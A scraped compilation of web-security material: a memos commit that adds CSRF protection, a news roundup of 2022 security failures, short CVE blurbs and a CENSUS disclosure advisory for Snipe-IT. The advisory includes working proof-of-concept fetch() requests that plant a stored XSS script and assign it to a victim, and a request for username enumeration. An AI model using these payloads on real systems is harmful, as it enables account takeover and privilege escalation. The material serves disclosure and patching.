Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.9.1.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 297

*   Code
*   Issues 50
*   Pull requests 3
*   Discussions
*   Actions
*   Projects 1
*   Wiki
*   Security
*   Insights

Permalink

Browse files

chore: fix CSRF (#876)

*   Loading branch information

1 parent 64e5c34 commit c9bb2b785dc5852655405d5c9ab127a2d5aa3948

Showing **2 changed files** with **5 additions** and **0 deletions**.

*   *   acl.go
    *   server.go

@@ -27,6 +27,7 @@ func setUserSession(ctx echo.Context, user \*api.User) error {

Path: "/",

MaxAge: 3600 \* 24 \* 30,

HttpOnly: true,

SameSite: http.SameSiteStrictMode,

}

sess.Values\[userIDContextKey\] \= user.ID

err := sess.Save(ctx.Request(), ctx.Response())

@@ -36,6 +36,10 @@ func NewServer(profile \*profile.Profile) \*Server {

\`"status":${status},"error":"${error}"}\` + "\\n",

}))

  

e.Use(middleware.CSRFWithConfig(middleware.CSRFConfig{

TokenLookup: "cookie:\_csrf",

}))

  

e.Use(middleware.CORS())

  

e.Use(middleware.TimeoutWithConfig(middleware.TimeoutConfig{

**0 comments on commit c9bb2b7**

Please sign in to comment.

CVE-2022-4850: chore: fix CSRF (#876) · usememos/memos@c9bb2b7

CVE-2022-4849

Epic web security fails and salutary lessons from another inevitably eventful year in infosec

Epic web security fails and salutary lessons from another inevitably eventful year in infosec

  

As 2022 draws to a close, The Daily Swig is revisiting some of the year’s most notable web security wins and egregious infosec fails.

Tomorrow we’ll publish some examples of the year’s cybersecurity successes, but today we’re kicking off with some amusing vulnerabilities, security disasters, and ‘must do better’ scorecards.

**Reddit NSFW bypass**

Reddit’s ‘Not safe for work’ restrictions could have been subverted via a cross-site request forgery (CSRF) vulnerability addressed by the social media platform in February.

The security bug enabled attackers to trick users into enabling the ‘I am over eighteen years old’ option and express a willingness to view adult content.

This medium severity issue earned the security researcher who found the flaw a $500 bug bounty.

**QWACkers proposal**

Mozilla, The Electronic Frontier Foundation, and dozens of computer science experts this year pleaded with EU lawmakers to abandon plans to force web browsers to recognize the validity of contentious web certificates created by the bloc.

A proposed amendment to the eIDAS – or electronic Identification, Authentication, and Trust Services – regulation would oblige browsers to accept Qualified Website Authentication Certificates (QWACs).

RECOMMENDED Finding the next Log4j – OpenSSF’s Brian Behlendorf on pivoting to a ‘risk-centred view’ of open source development

The EU created QWACs in 2014 to validate a website’s professed identity and therefore, supposedly, protect users from fraud, malware, and surveillance. Mozilla argues that QWACs are inferior to, and would circumvent, the more effective and longstanding web authentication ecosystem already in place.

Some 38 security experts signed an open letter criticizing the plans that was addressed to the European Parliament in March.

**  
Cyber fraud executive turned cyber fraudster**

A US entrepreneur who pocketed millions of dollars after falsifying bank statements to generate investment for his cyber fraud prevention firm was sentenced to five years for securities fraud in November.

In a classic case of nefarious activities belying the noble or socially important role they are ostensibly playing (‘effective altruist’ Sam Bankman-Fried is accused of similar), Adam Rogas was convicted in relation to using fraudulent financial data to secure more than $123 million in financing for NS8, the company he co-founded.

This figure includes around $17.5 million that he apparently “personally obtained”, as The Daily Swig reported in March.

US attorney Damian Williams said: “Adam Rogas took the ‘fake-it-till-you-make-it’ saying to a criminal extreme. While claiming to be in the fraud prevention business, Rogas himself faked nearly all of his company’s customers, revenue, and assets.”

**Patching process needs remediation**

There have been some improvements when it comes to developing and applying patches but there remain causes for concern.

Not least the bug of 2021 – and perhaps the century – ‘Log4Shell’ did not provoke a universal rush to patch, with a third of Log4j downloads still pulling vulnerable versions nearly a year after its emergence.

Other causes for concern on this front include Apache Software Foundation (ASF) expressing alarm at the numbers of organizations running end-of-life versions of Apache software, while a North Carolina State University study warned of unacceptable delays to open source patches being rolled out.

**AI still no substitute for human bug hunters**

ChatGPT represents a great leap forward for AI, but proved no surrogate for homo erectus when it comes to finding and disclosing software security vulnerabilities.

The game-changing large language model (LLM) from OpenAI has already being used to write ransomware and craft phishing campaigns and offers potential utility for defenders too.

However, it’s shortcomings as a bug bounty hunter were exposed this month when a OUSD stablecoin maintainer suspected his interlocutor was a chatbot.

Daniel Von Fange reported “inconstancy between emails – each email seemed to pretend we were discussing a different bug, and each was a bug based on nonsensical premises, and each set of code sent along to prove the issues was valueless”.

The ‘researcher’ who submitted the flaw ultimately admitted ChatGPT had detailed the bug’s impact, exploitability, and possible remedies, but still had the audacity to ask for a bounty.

Von Fange told The Daily Swig that “current LLMs are good at finding plausible reasons why code might have a vulnerability”, but a bigger breakthrough would come when AI can automatically write and run code to verify exploitability.

**LastPass existential crisis**

Another year, another drip-drip of data breaches great and small, and few – if any – have sparked as much alarm as the recent compromise at password management platform LastPass.

Infosec Twitter’s horror centers on the potential impact – 33 million customers entrust their passwords to the password management market leader – and the fact the breach appeared to become more severe with every fresh update from the beleaguered company.

LastPass first revealed its servers had been hacked in August, but said it had found “no evidence” that attackers had accessed “customer data or encrypted password vaults”.

However, this changed over the festive period when LastPass admitted that hackers had stolen an employee’s cloud storage keys and pilfered customers’ encrypted password vaults.

The company nevertheless now says that, so long as customers use the recommended default settings, “it would take millions of years to guess your master password using generally-available password-cracking technology”.

RELATED Password theft bug chain patched in Passwordstate credential manager

Stupid security 2022 – this year’s infosec fails

CSRF tokens are generated using math/rand, which is not a cryptographically secure rander number generation, making predicting their values relatively trivial and allowing an attacker to bypass CSRF protections which relatively few requests.

**Golf may allow attacker to bypass CSRF protections**

Moderate severity GitHub Reviewed Published Dec 28, 2022 • Updated Dec 30, 2022

GHSA-q9qr-jwpw-3qvv: Golf may allow attacker to bypass CSRF protections

A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file src/nsupdate/settings/base.py of the component CSRF Cookie Handler. The manipulation of the argument CSRF_COOKIE_HTTPONLY leads to cookie without 'httponly' flag. It is possible to initiate the attack remotely. The name of the patch is 60a3fe559c453bc36b0ec3e5dd39c1303640a59a. It is recommended to apply a patch to fix this issue. The identifier VDB-216909 was assigned to this vulnerability.

CVE-2019-25091

*   Why Go 
    *   Common problems companies solve with Go
        
    *   Stories about how and why companies use Go
        
    *   How Go can help keep you secure by default
        
*   Learn
*   Docs 
    *   Tips for writing clear, performant, and idiomatic Go code
        
    *   A complete introduction to building software with Go
        
    *   Reference documentation for Go's standard library
        
    *   Learn what's new in each Go release
        
*   Packages
*   Community 
    *   Videos from prior events
        
    *   Meet other local Go developers
        
    *   Learn and network with Go developers from around the world
        
    *   The Go project's official blog.
        
    *   Get help and stay informed from Go
        
    *   Get connected

CVE-2016-15005: GO-2020-0045 - Go Packages

The console in Togglz before 2.9.4 allows CSRF.

**Togglz console missing cross-site request forgery (CSRF) protection**

Moderate severity GitHub Reviewed Published Jul 15, 2022 • Updated Jul 15, 2022

CVE-2020-28191: CVE-2020-28191 - GitHub Advisory Database

The Bulk Delete Users by Email WordPress plugin through 1.2 does not have CSRF check when deleting users, which could allow attackers to make a logged in admin delete non admin users by knowing their email via a CSRF attack

CVE-2022-4266

In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are true.

CVE-2022-26969: Cross-Origin Resource Sharing (CORS) - HTTP | MDN

Snipe-IT through 6.0.14 allows attackers to check whether a user account exists because of response variations in a /password/reset request.

POSTED BY: Charalampos Maraziaris / 23.12.2022

**Multiple vulnerabilities in Snipe-IT**

CENSUS ID:

CENSUS-2022-0002

CVE IDs:

CVE-2022-44380, CVE-2022-44381

Affected Products:

Snipe-IT versions prior to 6.0.14

Class of CVE-2022-44380:

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

Class of CVE-2022-44381:

Improper Access Control (CWE-284)

Discovered by:

Charalampos Maraziaris

CENSUS identified Cross-Site Scripting (XSS) and username fingerprinting bugs in Snipe-IT. Snipe-IT is a free open source IT asset/license management system. CENSUS has verified that release 6.0.14 of Snipe-IT carries appropriate fixes only for the identified Cross Site Scripting vulnerabilities.

**CVE-2022-44380 Vulnerability Details**

A stored XSS vulnerability exists in the **"Account"** drop-down menu on the top-right of the app's UI (present in every page), when the user selects the **"View Assigned Assets"** options from the menu. A Stored XSS attack allows for adversaries to place malicious Javascript code into the database and have this Javascript code executed in a visitor's browser.

The loaded view (account/view-assets) renders Assets, Licences, Accessories and Consumables drawn from the database. The code responsible for presenting the database entries in the "account/view-assets" view (/resources/views/account/view-assets.blade.php) is presented below (release 6.0.12):

For Accessories: /resources/views/account/view-assets.blade.php

    
        550: <td>{!! $accessory->name !!}</td>
    

For Consumables: /resources/views/account/view-assets.blade.php

    
        598: <td>{!! $consumable->name !!}</td>
    

As shown above, the title is drawn from the database without using the double curly braces ({{ ... }}) that provide for HTML entity escaping in the Laravel Blade framework. Instead, ({!! ... !!}) is used that does not escape content. Therefore it is possible for an attacker to inject malicious Javascript in the Accessory and Consumable name field, and have this executed on a visitor's browser.

The stored XSS attack can be performed by an adversary that has **Accessory.CREATE** permissions (to insert an Accessory title in the database) and **Accessory.CHECKOUT** permissions (to assign this Accessory to any user). The same attack targeting Consumables can be performed by an adversary possessing **Consumable.CREATE** and **Consumable.CHECKOUT** permissions. Any user can be the victim of this attack as the malicious asset could be _assigned_ to that user. By targeting a Super User, an authenticated adversary can achieve privilege escalation, granting himself the Super User status.

As a proof of concept, the following payload creates a malicious **Accessory** entry:

    
    await fetch("http://SNIPE-IT-DOMAIN/accessories", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "multipart/form-data; boundary=---------------------------423391379527772494482286626525",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        },
        "referrer": "http://SNIPE-IT-DOMAIN/accessories/create",
        "body": "
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"_token\"\r\n\r\VALID_CSRF_TOKEN\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"company_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"name\"\r\n\r\nabc <script> alert(1); </script>\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"category_id\"\r\n\r\nVALID_CATEGORY_ID\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"supplier_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"manufacturer_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"location_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"model_number\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"order_number\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"purchase_date\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"purchase_cost\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"qty\"\r\n\r\n9999\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"min_amt\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"notes\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"image\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"image\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525--\r\n",
        "method": "POST",
        "mode": "cors"
    });
    

To execute the above payload one needs to replace the VALID\_CSRF\_TOKEN and VALID\_CATEGORY\_ID with valid values.

The adversary can then use the following payload to assign the malicious Accessory to a victim user:

    
    await fetch("http://SNIPE-IT-DOMAIN/accessories/ACCESSORY_ID/checkout", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "application/x-www-form-urlencoded",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        },
        "referrer": "http://SNIPE-IT-DOMAIN/accessories/ACCESSORY_ID/checkout",
        "body": "_token=VALID_CSRF_TOKEN&assigned_to=VICTIM_USER_ID&note=",
        "method": "POST",
        "mode": "cors"
    });
    

Please replace VALID\_CSRF\_TOKEN, VICTIM\_USER\_ID and ACCESSORY\_ID with the relevant values. ACCESSORY\_ID would be the identifier of the newly created malicious accessory. VICTIM\_USER\_ID would be another user's ID. For example the app creator is a privileged account and usually has the ID 1.

It is important to note that the payload can perform any action on the platform as the victim user, including elevating the permissions of the attacker (if the victim user is a privileged account).

**CVE-2022-44381 Vulnerability Details**

The password reset mechanism displays a different message based on whether the (attacker-controlled) input username exists in the user database or not. It is therefore possible for an attacker to fingerprint if a specific username exists in the deployed system or not.

The attacker needs to send a malicious POST request targeting /password/reset as shown below:

    
        "body" : "_token=XXX&password=password123&password_confirmation=password123&token=123&username=TARGET_USERNAME"
    

where "\_token" is a CSRF token obtained by a previous request, e.g. a failed post request to

/login

.

The functionality of reset() is as follows:

1.  It validates that the required FORM fields exist and are well formed. It does NOT verify however the validity of the RESET "token" (the random 123 value in our example).
2.  Checks if an activated user with this username exists in the user database.
    *   If so, it tries to reset the old password with the new one. This fails, since the token does not match the server issued token, and results to a redirect to an **error** page (line 119).
    *   If not, the application redirects to a **success** page (line 125).

    
        public function reset(Request $request)
        {
            $broker = $this->broker();
            $request->validate($this->rules(), $request->all(), $this->validationErrorMessages());
    
            // Check to see if the user even exists - we'll treat the response the same to prevent user sniffing
            if ($user = User::where('username', '=', $request->input('username'))->where('activated', '1')->whereNotNull('email')->first()) {
    
                // set the response
                $response = $broker->reset(
                    $this->credentials($request), function ($user, $password) {
                    $this->resetPassword($user, $password);
                });
    
                // Check if the password reset above actually worked
                if ($response == \Password::PASSWORD_RESET) {
                    return redirect()->guest('login')->with('success', trans('passwords.reset'));
                }
    
                \Log::debug('Password reset for '.$user->username.' FAILED - this user exists but the token is not valid');
    119:        return redirect()->back()->withInput($request->only('email'))->with('error', trans('passwords.token'));
            }
    
    
            \Log::debug('Password reset for '.$request->input('username').' FAILED - user does not exist or does not have an email address - but make it look like it succeeded');
    125:    return redirect()->guest('login')->with('success', trans('passwords.reset'));
        }
    

Therefore the attacker can infer whether a username exists in the database, based on the contents of the output page.

**Recommendation**

At the time of writing Snipe-IT has only addressed the XSS issues of CVE-2022-44380 in version 6.0.14. No patch is currently available for the user fingerprinting issue CVE-2022-44381. We will be updating this advisory if / when a patch arrives for CVE-2022-44381. CENSUS strongly recommends upgrading to version 6.0.14 (or greater) of Snipe-IT for the time being.

**Disclosure Timeline**

Vendor Contact:

November 8, 2022

CVE Allocation:

November 30, 2022

Vendor Fix Released:

December 9, 2022

Public Advisory:

December 23, 2022

Tag

#csrf